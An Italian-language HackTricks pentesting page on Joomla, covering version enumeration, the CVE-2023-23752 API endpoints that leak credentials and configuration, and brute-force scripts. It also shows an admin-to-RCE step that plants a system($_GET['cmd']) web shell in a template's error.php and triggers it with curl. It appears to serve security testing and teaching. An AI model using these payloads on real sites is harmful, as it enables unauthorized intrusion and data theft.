Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Approfondisci la tua esperienza in Mobile Security con 8kSec Academy. Padroneggia la sicurezza di iOS e Android attraverso i nostri corsi autogestiti e ottieni la certificazione:
Joomla raccoglie alcune statistiche di utilizzo anonime come la suddivisione delle versioni di Joomla, PHP e dei sistemi di database e dei sistemi operativi del server in uso nelle installazioni di Joomla. Questi dati possono essere interrogati tramite il loro API pubblico.
Controlla il meta
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml puoi vedere la versione.
In /language/en-GB/en-GB.xml puoi ottenere la versione di Joomla.
In plugins/system/cache/cache.xml puoi vedere una versione approssimativa.
In 80,443 - La metodologia di pentesting web è una sezione sui scanner CMS che possono scansionare Joomla.
Le versioni da 4.0.0 a 4.2.7 sono vulnerabili a divulgazione di informazioni non autenticata (CVE-2023-23752) che dumpa credenziali e altre informazioni.
Utenti: http://<host>/api/v1/users?public=true
File di configurazione: http://<host>/api/index.php/v1/config/application?public=true
Modulo MSF: scanner/http/joomla_api_improper_access_checks
o script ruby: 51334
Puoi utilizzare questo script per tentare di forzare l'accesso al login.
Se sei riuscito a ottenere credenziali admin, puoi RCE all'interno di esso aggiungendo un frammento di codice PHP per ottenere RCE. Possiamo farlo personalizzando un template.
Clicca su Templates
in basso a sinistra sotto Configuration
per aprire il menu dei template.
Clicca su un nome di template. Scegliamo protostar
sotto l'intestazione della colonna Template
. Questo ci porterà alla pagina Templates: Customise
.
Infine, puoi cliccare su una pagina per aprire il sorgente della pagina. Scegliamo la pagina error.php
. Aggiungeremo un PHP one-liner per ottenere l'esecuzione del codice come segue:
system($_GET['cmd']);
Salva & Chiudi
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Script di sfruttamento Joomla che eleva XSS a RCE o altre vulnerabilità critiche. Per ulteriori informazioni controlla questo post. Fornisce supporto per le versioni Joomla 5.X.X, 4.X.X e 3.X.X, e consente di:
Escalation dei privilegi: Crea un utente in Joomla.
(RCE) Modifica dei template integrati: Modifica un template integrato in Joomla.
(Custom) Sfruttamenti personalizzati: Sfruttamenti personalizzati per plugin Joomla di terze parti.
Approfondisci la tua esperienza in Mobile Security con 8kSec Academy. Padroneggia la sicurezza di iOS e Android attraverso i nostri corsi autogestiti e ottieni una certificazione:
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)